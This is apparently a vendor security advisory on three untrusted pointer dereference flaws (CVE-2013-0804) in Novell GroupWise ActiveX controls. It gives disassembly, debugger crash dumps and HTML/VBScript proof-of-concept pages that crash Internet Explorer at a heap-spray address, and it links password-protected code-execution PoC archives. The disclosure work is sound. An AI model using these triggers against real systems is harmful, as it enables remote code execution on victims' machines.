High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell GroupWise, which could be exploited to compromise a remote system.
1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804 1.1 The vulnerability exists due to an untrusted pointer dereference error in the InvokeContact() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll" A remote attacker can pass an arbitrary value to the pInvokeParams argument of the InvokeContact() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register. 5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] Later this value will be allocated into the stack: 5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX The code continues its flow and enters a switch case algorithm: 5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1 5722D311 0F84 57010000 JE gwabdlg.5722D46E 5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2 5722D31E 0F84 00010000 JE gwabdlg.5722D424 5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3 5722D32B 0F84 83010000 JE gwabdlg.5722D4B4 5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4 5722D338 0F84 AF020000 JE gwabdlg.5722D5ED 5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5 5722D345 0F84 9A030000 JE gwabdlg.5722D6E5 5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6 If an attacker can specify a custom switch value, in this case the number 3, it will jump to the address 0x5722D4B4 5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX 5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0 5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28] 5722D4C1 50 PUSH EAX 5722D4C2 68 58122D57 PUSH gwabdlg.572D1258 5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C] 5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30] 5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C] 5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30] 5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX] 5722D4D5 51 PUSH ECX 5722D4D6 FF10 CALL DWORD PTR DS:[EAX] After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction: 0C0C0C0C 0C 0C OR AL,0C 0C0C0C0E 0C 0C OR AL,0C 0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX] 0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL 0C0C0C14 0C 0C OR AL,0C 0C0C0C16 0C 0C OR AL,0C 0C0C0C18 0C 0C OR AL,0C 0C0C0C1A 0C 0C OR AL,0C
Crash details: (162c.5ae0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4 eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - gwabdlg!DllUnregisterServer+0x4c10e: 5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9: <html> <!-- (c)oded by High-Tech Bridge Security Research Lab --> <head> <title> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title> </head> <script language='vbscript'> Sub PoC() arg1=202116104 target.InvokeContact arg1 End Sub </script> <body> <h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3> <h4> Untrusted Pointer Dereference PoC </h4> <hr> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR> <input language=VBScript onclick=PoC() type=button value="Proof of Concept"> </body> <object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF' id='Target'></object> </html>
Code execution PoC: The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode. https://www.immuniweb.com/advisory/HTB23131_POC_1.zip Archive's Password: HTB23131_novell(gw)
1.2 The vulnerability exists due to an untrusted pointer dereference error in the GenerateSummaryPage() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll". A remote attacker can pass an arbitrary value to the pInvokeParams argument of the GenerateSummaryPage() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register. 5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] Later this value will be allocated into the stack: 5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX The code continues its flow and enters a switch case algorithm: 5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1 5722D311 0F84 57010000 JE gwabdlg.5722D46E 5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2 5722D31E 0F84 00010000 JE gwabdlg.5722D424 5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3 5722D32B 0F84 83010000 JE gwabdlg.5722D4B4 5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4 5722D338 0F84 AF020000 JE gwabdlg.5722D5ED 5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5 5722D345 0F84 9A030000 JE gwabdlg.5722D6E5 5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6 If an attacker can specify a custom switch value, in this case the number 3, it will jump to address 0x5722D4B4 5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX 5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0 5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28] 5722D4C1 50 PUSH EAX 5722D4C2 68 58122D57 PUSH gwabdlg.572D1258 5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C] 5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30] 5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C] 5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30] 5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX] 5722D4D5 51 PUSH ECX 5722D4D6 FF10 CALL DWORD PTR DS:[EAX] After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction. 0C0C0C0C 0C 0C OR AL,0C 0C0C0C0E 0C 0C OR AL,0C 0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX] 0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL 0C0C0C14 0C 0C OR AL,0C 0C0C0C16 0C 0C OR AL,0C 0C0C0C18 0C 0C OR AL,0C 0C0C0C1A 0C 0C OR AL,0C
Crash details: (162c.5ae0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4 eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - gwabdlg!DllUnregisterServer+0x4c10e: 5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9: <html> <!-- (c)oded by High-Tech Bridge Security Research Lab --> <head> <title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title> </head> <script language='vbscript'> Sub PoC() arg1=202116108 arg2="defaultV" arg3="defaultV" target.GenerateSumm aryPage arg1 ,arg2 ,arg3 End Sub </script> <body> <h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3> <h4>Untrusted Pointer Dereference PoC</h4> <hr> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR> <input language=VBScript onclick=PoC() type=button value="Proof of Concept"> </body> <object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF' id='Target'></object> </html>
Code execution PoC: The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode. https://www.immuniweb.com/advisory/HTB23131_POC_2.zip Archive's Password: HTB23131_novell(gw)
1.3 The vulnerability exists due to an untrusted pointer dereference error in the SecManageRecipientCertificates() method within the ActiveX control (gwmim1.ocx, GUID {BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}, located by default in "C:\Program Files\Novell\GroupWise\gwmim1.ocx". A remote attacker can pass an arbitrary value to the lProp argument of the SecManageRecipientCertificates() method and trigger the ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction. Since it is possible to supply a specially crafted pointer, an attacker can abuse this flaw relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer into the EDX register. 10014805 MOV EDX,DWORD PTR DS:[ECX] Later the same operation is performed, however this time it is the EAX register that inherits the untrusted pointer value. 10014807 MOV EAX,DWORD PTR DS:[EDX] Eventually code execution is reached at the address 0x10014809 10014809 CALL EAX
Crash details: (5c78.58f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000 eip=10014805 esp=0275c45c ebp=0275c55c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx - gwmim1!DllUnregisterServer+0x8cb5: 10014805 8b11 mov edx,dword ptr [ecx] ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9: <html> <!-- (c)oded by High-Tech Bridge Security Research Lab --> <head> <title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title> </head> <script language='vbscript'> Sub PoC() arg1=202116108 target.SecManageRecipientCertificates arg1 End Sub </script> <body> <h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3> <h4> Untrusted Pointer Dereference PoC </h4> <hr> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR> <input language=VBScript onclick=PoC() type=button value="Proof of Concept"> </body> <object classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A'id='Target'></object> </html>
Code execution PoC: The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode. https://www.immuniweb.com/advisory/HTB23131_POC_3.zip Archive's Password: HTB23131_novell(gw) |